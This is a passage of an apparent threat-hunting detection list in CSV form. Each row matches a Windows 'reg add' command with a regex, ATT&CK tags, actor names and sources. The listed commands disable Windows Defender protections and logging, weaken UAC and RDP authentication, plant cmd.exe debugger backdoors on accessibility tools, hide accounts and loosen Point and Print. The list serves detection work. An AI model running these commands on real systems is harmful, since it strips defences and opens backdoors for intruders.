""00000000""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Terminal\sServices\""\s\/f\s\/v\sUserAuthentication\s\/t\sREG_DWORD\s\/d\s\""00000000\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"" /f /v SecurityLayer /t REG_DWORD /d ""00000001""*",".{0,1000}REG\sADD\s\""HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\sServer\\WinStations\\RDP\-Tcp\""\s\/f\s\/v\sSecurityLayer\s\/t\sREG_DWORD\s\/d\s\""00000001\"".{0,1000}","greyware_tool_keyword","reg","making Remote Desktop Protocol (RDP) more vulnerable to unauthorized access.","T1021 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L19","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications"" /v DisableNotifications /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sDefender\sSecurity\sCenter\\Notifications\""\s\/v\sDisableNotifications\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\Software\Microsoft\Windows Defender"" /v DisableAntiSpyware and DisableAntiVirus /t REG_DWORD /d ""1"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Microsoft\\Windows\sDefender\""\s\/v\sDisableAntiSpyware\sand\sDisableAntiVirus\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\HelpPane\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe"" /f /v Debugger /t REG_SZ /d 
""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\Magnify\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /f /v Debugger /t REG_SZ /d ""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"" /f /v Debugger /t REG_SZ /d 
""%windir%\system32\cmd.exe""*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\utilman\.exe\""\s\/f\s\/v\sDebugger\s\/t\sREG_SZ\s\/d\s\""\%windir\%\\system32\\cmd\.exe\"".{0,1000}","greyware_tool_keyword","reg","modify the Image File Execution Options to substitute accessibility tools with cmd.exe enabling privilege escalation by launching an elevated command prompt","T1546.012 - T1059.003 - T1055.001 - T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/cmd.cmd#L12","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist"" /v * /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Microsoft\\Windows\sNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\""\s\/v\s.{0,1000}\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","hiding a user from the login screen by modifying a specific registry key","T1112 - T1564.001","TA0005 - TA0003","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*REG ADD ""hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""ConsentPromptBehaviorAdmin"" /t REG_Dword /d 00000000 /f*",".{0,1000}REG\sADD\s\""hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\s\""ConsentPromptBehaviorAdmin\""\s\/t\sREG_Dword\s\/d\s00000000\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the UAC consent prompt for administrators","T1112","TA0004","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege 
Escalation","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sConsentPromptBehaviorAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sConsentPromptBehaviorAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the consent prompt for administrators","T1112","TA0004","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v EnableLUA /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sEnableLUA\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User 
Account Control (UAC) settings / reduce security prompts for administrative actions (note: EnableLUA set to 1 keeps UAC enabled - on its own this value does not weaken the host)","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sPromptOnSecureDesktop\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable security notifications / adjust User Account Control (UAC) settings / reduce security prompts for administrative actions","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v PromptOnSecureDesktop /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\""\s\/v\sPromptOnSecureDesktop\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disables the secure desktop for User Account Control (UAC) prompts","T1112","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v AllowFastServiceStartup /t REG_DWORD /d 0 
/f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sAllowFastServiceStartup\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"" /v ServiceKeepAlive /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\""\s\/v\sServiceKeepAlive\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender - prevent it from starting quickly and prevent services from staying alive","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableBehaviorMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableIOAVProtection /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableIOAVProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableOnAccessProtection /t REG_DWORD /d 1 
/f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableOnAccessProtection\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableRealtimeMonitoring\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Real\-Time\sProtection\""\s\/v\sDisableScanOnRealtimeEnable\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","disable real-time protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\Reporting"" /v ""DisableEnhancedNotifications"" /t REG_DWORD /d ""1"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\Reporting\""\s\/v\s\""DisableEnhancedNotifications\""\s\/t\sREG_DWORD\s\/d\s\""1\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v ""SpyNetReporting"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\s\""SpyNetReporting\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet"" /v ""SubmitSamplesConsent"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\s\""SubmitSamplesConsent\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable protection features of Windows Defender","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sDisableBlockAtFirstSeen\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v LocalSettingOverrideSpyNetReporting /t REG_DWORD /d 0 /f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sLocalSettingOverrideSpyNetReporting\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*REG ADD ""HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet"" /v SubmitSamplesConsent /t REG_DWORD /d 2 
/f*",".{0,1000}REG\sADD\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\SpyNet\""\s\/v\sSubmitSamplesConsent\s\/t\sREG_DWORD\s\/d\s2\s\/f.{0,1000}","greyware_tool_keyword","reg","reduce Windows Defender's ability to block suspicious files and prevent sample submissions to Microsoft","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintOnly\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint"" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 
1*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\""\s\/f\s\/v\sPackagePointAndPrintServerList\s\/t\sREG_DWORD\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z" "*reg add ""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers"" /f /v 1 /t REG_SZ /d *",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PackagePointAndPrint\\ListofServers\""\s\/f\s\/v\s1\s\/t\sREG_SZ\s\/d\s.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z" "*reg add 
""HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0*",".{0,1000}reg\sadd\s\""HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sNT\\Printers\\PointAndPrint\""\s\/f\s\/v\sRestrictDriverInstallationToAdministrators\s\/t\sREG_DWORD\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","mimikatz command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","BlackSuit - Royal - Black Basta - Akira - Phobos - PLAY - Karakurt - Scattered Spider - AvosLocker - LockBit - Conti - Bassterlord - Quantum - PYSA - NetWalker - GoGoogle - 8BASE - Trigona - Cuba - RansomEXX - BlackCat","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#registry","N/A","10","10","19219","3669","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z" "*reg add ""HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger"" /v ""Start"" /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable logging related to Windows Defender","T1070.003 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 